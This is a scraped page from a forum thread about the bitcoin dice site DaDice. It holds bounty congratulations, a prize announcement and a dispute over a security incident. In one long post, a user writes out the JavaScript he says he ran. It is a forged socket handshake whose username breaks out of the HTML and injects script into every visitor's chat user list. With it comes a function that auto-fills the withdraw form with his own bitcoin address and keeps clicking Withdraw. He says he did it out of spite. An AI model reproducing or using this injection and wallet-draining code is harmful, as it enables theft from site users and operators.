Pages:
Author

Topic: DaDice.com - Next Gen Social Gambling Dice Experience | Progressive Jackpot - page 84. (Read 257856 times)

sr. member
Activity: 336
Merit: 250
have fun
Congratulations to BitcoinMage for this great win
I rolled 200,000,004  Grin but it was so fun watching all the mates cheering on the chat
I was also really near to win the prediction of the finals yesterday
but as I usual , I'm only near  Grin Grin
Congrats to all winners , and long live Dadice

Oh that is really close ! I remember no other gives such cool promotions, I really wish DaDice reach new milestone everyday. They are really friendly in their support too.
legendary
Activity: 2436
Merit: 1804
guess who's back
Congratulations to BitcoinMage for this great win
I rolled 200,000,004  Grin but it was so fun watching all the mates cheering on the chat
I was also really near to win the prediction of the finals yesterday
but as I usual , I'm only near  Grin Grin
Congrats to all winners , and long live Dadice
sr. member
Activity: 336
Merit: 250
have fun
I am really thankful to the creators of dadice Tongue , I played here for some weeks and I stopped after making profit. This is the best site so far where I have played dice Smiley
hero member
Activity: 686
Merit: 500
Congratulation to @BitcoinMage for fantastic win of 1.15 Btc and nextgen to date prediction bounty. Grin
full member
Activity: 154
Merit: 100
Roll #200,000,000 BTC Bounty Winner Announcement :





Once again a huge thank you to all who helped us roll the 200,000,000 rolls we needed to get here!
Without you there would be no winner and no bounty to claim.
The bounty was set at 0.5 if it had occoured on the 19th June 2015 and would raise by 0.05BTC for every day earlier. It was indeed much earlier!
We have 1 winner for the roll and only 1 winner for the date prediction. Unfortunately no one got the date on our social media pages.
The results were as follows :
  
                                
Won a fantastic 1.15 BTC #200,000,000 - @BitcoinMage - paid to their DaDice account as they requested!

Massive congratulations there indeed!

The 0.1 btc winner for the predictions is as follows:

For The BTC talk Prediction:

NextGen - 06/06/2015   - 1KL6soQGw9MCMeGo78vCwgTbGzZ66pCor5



Once again huge Congratulations to our winners!

We hope you all had fun as we counted down to the 200 million Roll Bounty!
Keep Rollin’
sr. member
Activity: 252
Merit: 250
DaDice Administration
Heh heh A huge congrats to our winners! We will make an official announcement with bounties and so forth by tomorrow or so but again well done to our winners and a huge thank you to everyone
congrats to the dadice to hit the 200 million roll and to the winner of the bounty, that is nice achievement to cross the 200 million bets there now dadice getting over 5 million roll per day so that is nice growth for any new business, i hope everything will turn good in near future, best of luck dadice team. Cheesy

Thank you very much!
legendary
Activity: 1050
Merit: 1000
Heh heh A huge congrats to our winners! We will make an official announcement with bounties and so forth by tomorrow or so but again well done to our winners and a huge thank you to everyone
congrats to the dadice to hit the 200 million roll and to the winner of the bounty, that is nice achievement to cross the 200 million bets there now dadice getting over 5 million roll per day so that is nice growth for any new business, i hope everything will turn good in near future, best of luck dadice team. Cheesy
full member
Activity: 154
Merit: 100
Heh heh A huge congrats to our winners! We will make an official announcement with bounties and so forth by tomorrow or so but again well done to our winners and a huge thank you to everyone
full member
Activity: 154
Merit: 100
SOOOOON!!!!!!!!



197 million rolls already!. Will the bounty hit today or tomorrow?

The bounty could be an incredible 1.15BTC if it hits today!

Keep watching and especially keep rollin
full member
Activity: 154
Merit: 100
Well I did say exactly the same thing:

Anyway, all this happened this time because our socket script didn't sanitize some data (background variables, exploited from console) which was sent along with chat messages or other online/offline commands.

Chat/Sockets script did only sanitize the user-submitted data, not the data coming from JS. This was the actual exploit Smiley Necessary actions were taken and this is now fixed. If you have anything further to report, you can do so like others have done before, contact our support and expect a bounty reward.

Well said from the dev there. The bounty offered for bug reporting is more than just a bit of money. It's an act of good faith that shows we appreciate good feedback from our players or those who discover something. Our dev has also admitted the problem and fixed the issue in good time as well so that should be the end of that I believe. Rather behave in what I feel is a civilised and intelligent manner (as I just mentioned) then spend time and unnecessary energy on roundabout attacking routes. This way we can actually build a proper community rather than what appears to be the case now
newbie
Activity: 48
Merit: 0
Well I did say exactly the same thing:

Anyway, all this happened this time because our socket script didn't sanitize some data (background variables, exploited from console) which was sent along with chat messages or other online/offline commands.

Chat/Sockets script did only sanitize the user-submitted data, not the data coming from JS. This was the actual exploit Smiley Necessary actions were taken and this is now fixed. If you have anything further to report, you can do so like others have done before, contact our support and expect a bounty reward.
member
Activity: 116
Merit: 10
Or just stop using JS, the worst "language" on the planet.
member
Activity: 106
Merit: 10
The un-official report of how this attack was able to happen

Sorry, dadice_dev didn't explain how it happened. So I thought I would add an explanation so the public can make up for themselves if it was or wasn't serious. My oppinion is this is serious. But what do I know? This will be my last post on dadice.

After the first attack. Explained here:
https://bitcointalksearch.org/topic/m.11351048

A fix was sorted to prevent users being impersonated. However, the injection method stayed the same. In fact back then it was possible to do the same thing. However, the test here was to see if DaDice would lie about the severity and I didn't want to impact them too much. Think of it as a free bug report.

So back to what enabled all this drama.

The object:
Code:
var socket_handshake_gameplay_token

is the offending player. It tells the chat server who you are.

Code:
var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": "One",
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
};

It is sent to the chat server to update the chat server.
Code:
socket.emit("online", socket_handshake_gameplay_token);

Thats fine, so how can we use this to update all clients with some JS code?

That required a lot of trial and error. Finding ways to do things is not always as simple as reading the code. One must first understand how these will render on the client browser. There was lots of time to be caught in the act. Maybe DaDice wanted to watch or just legitimately didn't think it was all that serious.

The userlist on the chat window is now where we need to look. The chat box does not allow scripts to run, but the userlist still updated with the new name change. Like this:
Code:
var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": "Two", //change name and user list updates
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
}

So now what.. We can make the server send our new username to all clients and all new clients.

Lets try running some JS. and keep the original HTML so it doesn't cause errors.
Code:
var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": 'One"  class="" href="javascript:;">',
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
}

Now we can run any script we want. We could have called our own server and sent cookies and session data, or maybe implement subtle things like redirect the deposit code to our btc address. Since no one deposits on DaDice, that would be a tremendous waste of time.

A script to auto withdraw the dust was more fun.. But the hot wallet rarely has more than 0.1btc in it. This was not to take coin, but to show the dev he is arrogant. Had he not dismissed my first post I probably would have just reported it (I'm not interested in bug bounty money, I already have more than enough money). But he was a prick and I felt it would be better to just do another attack using JS. Maybe they can learn to be nice in the future. I was not paid nor did I do it to benefit any other dice site. This was done purely out of my personal spite to the people running DaDice because they were assholes to me.

My code here is pretty messy, setting up some events would have been better, but I was pretty lazy and the wallet only had 0.008btc left in it.
Code:
function clickButton(buttonName){$(".btn").each(function(i, obj) {
  if ($(this).text()==buttonName){$(this).click();
$("#withdraw_payee").val("1Nu7zXeUEV1aBzVQCtY4unDiFJFxdRSN9b");
$("#withdraw_amount").val("0.001");}});
};

setInterval(function(){alert("DaDice has been Hacked.. bullshit message");clickButton("Withdraw");},5000);

Then entire JS injection that was pasted into the console was this. This is not exactly as it was, because I was coding in the console and didn't save it. But you get the idea.
Code:
var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": 'One"  class="" href="javascript:;">',
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
};
socket.emit("online", socket_handshake_gameplay_token);
socket.emit("online_list_request", socket_handshake_gameplay_token);

I will also be sending back the 0.008btc drained from the hot wallet to an account on DaDice, and I will even send a few extra dust particles as interest for the loan.  This will also end the DaDice attacks. Someone else will probably find something new. Who knows. So be careful because DaDice have a history of taking a long time to fix known issues. If I wasn't so open, this would still be going on.

The point is, DaDice knew about this for weeks and nothing was done about it. They lied about the severity, or didn't realize the severity. If I ran a dice site, and had the same issue, I probably would try step around the severity too, can't blame them on that front. It was a simple chat attack. But this "simple" attack was a serious breach as we were able to run as much code as we wanted to. Anything could have been done on the client machines.
It also would have been prevented if they just allowed a skype call that I requested and was ignored.

I wished the Dev would have posted something more concrete like this. but instead he just tried to reduce it to a simple chat attack that did not impact their security. Yes it was indeed simple, but it was a major security breach.

Enjoy the day.
member
Activity: 106
Merit: 10
Your arrogance is really quite annoying to me. You think everyone is dumber than you.
BTW - still no clear explanation from the developer of dadice.

Well, still you are very busy in our thread. Dev was online all day and addressed all issues. As we recommended earlier, you can also email support and might get a bounty - but as we know, this is not on your hidden agenda.

Bump!

Even if I did have anything to tell you, your dev fixed it (according to his statement). So nothing to report.

You probably should calm your shills down. They are getting kind of offensive, I had to block one angry mobster. Anyway, I'm done here. Enjoy your lives, till the next great bitcoin scam attempt.

And shills, please do calm down, you are more pissed off about these reports than the dadice_staff is.
sr. member
Activity: 252
Merit: 250
DaDice Administration
Your arrogance is really quite annoying to me. You think everyone is dumber than you.
BTW - still no clear explanation from the developer of dadice.

Well, still you are very busy in our thread. Dev was online all day and addressed all issues. As we recommended earlier, you can also email support and might get a bounty - but as we know, this is not on your hidden agenda.

Bump!
newbie
Activity: 56
Merit: 0
*lot of bullshit*

he he he ho ho ho... You still didn't take my advice? Sad poor lad
member
Activity: 106
Merit: 10
Why would you keep switching between QuickSellet and AcctSeller?

It's called sockpuppetry---classic technique in internet trolling.  The more interesting question is how many others of the haters in this thread are QS and whether or not he funded this attack himself.

Most probably he did! Personally I thought so long, but it would be inappropriate if I would have mentioned it.

Then we better see how long "their" "fundings" "might" "last"! Afterall there is some source of fuel for all these trolls & co.

Oh yes of course, but it is very beneficial for us in the long run. Just think if they would remain silent and bury our thread.

Indeed but still somewhat sad that all they use at the moment is ad hominems, straw man tactics and the myriad other logical fallacies available to them

Yeah true, but anyway, that is how immature kids are. And of course, they are all experts  Huh

Well, bitcoin is a kind of niche that attracks many geek types. So there could well be a lot of experts in this space. We have just heard of one who works as a pentester. So I would say he is an expert.

Your arrogance is really quite annoying to me. You think everyone is dumber than you.
BTW - still no clear explanation from the developer of dadice.
sr. member
Activity: 252
Merit: 250
DaDice Administration
Why would you keep switching between QuickSellet and AcctSeller?

It's called sockpuppetry---classic technique in internet trolling.  The more interesting question is how many others of the haters in this thread are QS and whether or not he funded this attack himself.

Most probably he did! Personally I thought so long, but it would be inappropriate if I would have mentioned it.

Then we better see how long "their" "fundings" "might" "last"! Afterall there is some source of fuel for all these trolls & co.

Oh yes of course, but it is very beneficial for us in the long run. Just think if they would remain silent and bury our thread.

Indeed but still somewhat sad that all they use at the moment is ad hominems, straw man tactics and the myriad other logical fallacies available to them

Yeah true, but anyway, that is how immature kids are. And of course, they are all experts  Huh
full member
Activity: 154
Merit: 100
Why would you keep switching between QuickSellet and AcctSeller?

It's called sockpuppetry---classic technique in internet trolling.  The more interesting question is how many others of the haters in this thread are QS and whether or not he funded this attack himself.

Most probably he did! Personally I thought so long, but it would be inappropriate if I would have mentioned it.

Then we better see how long "their" "fundings" "might" "last"! Afterall there is some source of fuel for all these trolls & co.

Oh yes of course, but it is very beneficial for us in the long run. Just think if they would remain silent and bury our thread.

Indeed but still somewhat sad that all they use at the moment is ad hominems, straw man tactics and the myriad other logical fallacies available to them
sr. member
Activity: 252
Merit: 250
DaDice Administration
Why would you keep switching between QuickSellet and AcctSeller?

It's called sockpuppetry---classic technique in internet trolling.  The more interesting question is how many others of the haters in this thread are QS and whether or not he funded this attack himself.

Most probably he did! Personally I thought so long, but it would be inappropriate if I would have mentioned it.

Then we better see how long "their" "fundings" "might" "last"! Afterall there is some source of fuel for all these trolls & co.

Oh yes of course, but it is very beneficial for us in the long run. Just think if they would remain silent and bury our thread.
Pages:
Jump to: